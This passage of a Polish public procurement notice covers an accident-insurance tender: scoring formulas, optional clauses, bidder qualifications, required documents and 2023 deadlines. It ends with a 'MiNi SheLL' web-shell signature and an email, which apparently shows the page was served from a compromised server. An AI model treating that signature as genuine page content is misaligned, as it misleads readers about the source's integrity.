przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium oceny ofert:<br/>Cena łączna ubezpieczenia – 80%<br/> Klauzule fakultatywne - 20 %<br/><br/>Cena łączna ubezpieczenia – suma składek za wszystkie ubezpieczenia będące przedmiotem niniejszego przetargu dla zadania C.<br/><br/><br/><br/>Oferty będą podlegały ocenie według następującego wzoru:<br/><br/><br/> C min<br/> A = _________ x 80 % x 100<br/> Cb<br/> <br/><br/>A - liczba punktów przyznana ofercie za spełnienie kryterium cena <br/>Cmin – cena minimalna wśród złożonych ofert<br/>Cb - cena oferty badanej <br/>80 % - wskaźnik stały<br/><br/>- Klauzule fakultatywne:<br/> Z<br/> B = _______ x 20 % x 100<br/> Z max<br/><br/><br/> B - liczba punktów przyznana ofercie za spełnienie kryterium klauzule fakultatywne <br/> Z - liczba punktów oferty badanej<br/> Zmax - najwyższa liczba punktów pośród ofert ważnych i nie odrzuconych <br/>20 - wskaźnik stały<br/><br/><br/>Klauzule fakultatywne:<br/>•	Bez składkowe podniesienie sumy ubezpieczenia NNW w ubezpieczeniu bezimiennym: podniesienie SU określonej fakultatywnie o 10 % - 10 punktów, o 20 % - 20 punktów, o 30 % - 20 punktów. Brak fakultatywnego podniesienia SU – 0 punktów,<br/>•	Zwiększenie w stosunku do limitu określonego obligatoryjnie dodatkowego świadczenia za oparzenia lub odmrożenia w ubezpieczeniu bezimiennym – z 20 do 30 % świadczenia podstawowego – 20 punktów, z 20 do 40 % świadczenia podstawowego – 40 punktów. Dodatkowe świadczenie w wysokości 20 % SU świadczenia podstawowego – 0 punktów.<br/>•	Wypłata dodatkowego świadczenia w wariancie bezimiennym w kwocie 30 PLN dziennie przez okres<br/> maksymalny 90 dni zasiłku dziennego z tytułu niezdolności do pracy spowodowanym nieszczęśliwym<br/> wypadkiem lub zdarzeniem objętym umową ubezpieczenia – włączenie do zakresu ochrony 20 punktów, brak włączenia 0 punktów.<br/>•	Wypłata dodatkowego świadczenia w wariancie bezimiennym w kwocie 30 PLN dziennie przez okres<br/>maksymalny 60 dni diety szpitalnej z tytułu niezdolności do pracy spowodowanym nieszczęśliwym<br/>wypadkiem lub zdarzeniem objętym umową ubezpieczenia – włączenie do zakresu ochrony 20 punktów, brak włączenia 0 punktów.<br/>•	Zwiększenie w stosunku do limitu określonego obligatoryjnie dodatkowego jednorazowego świadczenia za pobyt w szpitalu w ubezpieczeniu bezimiennym – z 5 % do 10 % świadczenia podstawowego – 20 punktów, z 5% do 15 % świadczenia podstawowego – 30 punktów. Dodatkowe świadczenie w wysokości 20 % SU świadczenia podstawowego – 0 punktów.<br/><br/>W celu wyboru najkorzystniejszej oferty w powiązaniu z przedstawionym wyżej kryterium Zamawiający będzie posługiwał się następującym wzorem:<br/><br/>W = A + B <br/><br/>W – wskaźnik oceny oferty – suma punktów za kryterium ”A” i „B”<br/>A - liczba punktów za kryterium A<br/>B - liczba punktów za kryterium B<br/><br/>Zamówienie publiczne zostanie udzielone Wykonawcy, który uzyska największą liczbę punktów za kryterium cena oraz dodatkowy fakultatywny zakres ubezpieczenia. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej oferty przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy którzy: <br/>1) nie podlegają wykluczeniu na podstawie pkt k) SWZ,<br/>2) spełniają określone przez Zamawiającego warunki udziału w postępowaniu w zakresie:<br/>a) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w tym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada zezwolenie na wykonywanie działalności ubezpieczeniowej na terenie Rzeczpospolitej Polskiej, zgodnie z ustawą z dnia 11.09.2015r. o działalności ubezpieczeniowej i reasekuracyjnej, w zakresie tożsamym z przedmiotem niniejszego zamówienia lub, w przypadku prowadzenia działalności ubezpieczeniowej na innej podstawie niż zezwolenie, inny dokument potwierdzający, że Wykonawca uprawniony jest do wykonywania działalność ubezpieczeniowej na terenie Rzeczpospolitej Polskiej w zakresie tożsamym z przedmiotem niniejszego zamówienia.<br/><br/>c) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w tym<br/>zakresie;<br/>d) zdolności technicznej lub zawodowej: Zamawiający nie stawia warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">•	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzony nie wcześniej niż 3 miesiące przed jego / jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">•	zezwolenie na wykonywanie działalności ubezpieczeniowej na terenie Rzeczpospolitej Polskiej, zgodnie z ustawą z dnia 11.09.2015r. o działalności ubezpieczeniowej i reasekuracyjnej, w zakresie tożsamym z przedmiotem niniejszego zamówienia lub, w przypadku prowadzenia działalności ubezpieczeniowej na innej podstawie niż zezwolenie, inny dokument potwierdzający, że Wykonawca uprawniony jest do wykonywania działalność ubezpieczeniowej na terenie Rzeczpospolitej Polskiej w zakresie tożsamym z przedmiotem niniejszego zamówienia.<br/>•	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j.Dz.U.2020.1076 z późn.zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> d)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie wstępne SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. Zasady dotyczące składania oraz formy oświadczenia wstępnego określone w pkt 2. SWZ stosuje się odpowiednio ( wersja elektroniczna).<br/>e)	Wykonawca, który korzysta z podwykonawców, w celu wykazania braku istnienia wobec nich podstaw wykluczenia składa oświadczenie wstępne, o którym mowa w SWZ dotyczące tych podmiotów. Zasady dotyczące składania oraz formy oświadczenia wstępnego określone w pkt 2. SWZ stosuje się odpowiednio ( wersja elektroniczna).<br/>f)	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające jego zakres, podpisane przez osobę/y upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą;<br/>g)	W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, pełnomocnictwo określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu;<br/>h)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy stanowią Załącznik nr 8, 9 i 10 do SWZ. Zmiany umowy możliwe zgodnie z przewidzianymi okolicznościami w ustawie Prawo zamówień publicznych oraz zgodnie ze wskazanymi okolicznościami w postanowieniach umownych zawartych w w/w wzorach umów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://radoszyce.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com